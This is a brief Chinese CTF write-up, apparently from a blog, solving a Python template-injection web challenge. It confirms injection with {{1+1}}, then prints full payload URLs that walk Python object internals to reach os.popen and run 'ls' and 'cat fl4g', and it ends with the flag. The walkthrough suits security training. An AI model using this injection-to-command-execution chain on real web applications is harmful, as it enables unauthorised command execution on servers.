攻防世界web进阶区之Web_python_template_injection

点开题目所给链接:在这里插入图片描述我们通过 {{1+1}} 判断了它存在phthon模块注入:在这里插入图片描述通过 http://220.249.52.133:36210/%7B%7B’’.class.mro[2].subclasses()%7D%7D访问所有模块。
我们可以借用 os.popen来读取我们想要的flag文件里的信息
构造http://220.249.52.133:36210/%7B%7B’’.class.mro[2].subclasses()[71]%E3%80%80%E3%80%80.init.globals[‘os’].popen(‘ls’).read()%7D%7D在这里插入图片描述可发现我们要的flag就在fl4g里,我们查看这个文件即可,构造http://220.249.52.133:36210/%7B%7B’’.class.mro[2].subclasses()[71]%E3%80%80%E3%80%80.init.globals[‘os’].popen(‘cat%20fl4g’).read()%7D%7D在这里插入图片描述得到flag:ctf{f22b6844-5169-4054-b2a0-d95b9361cb57}

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值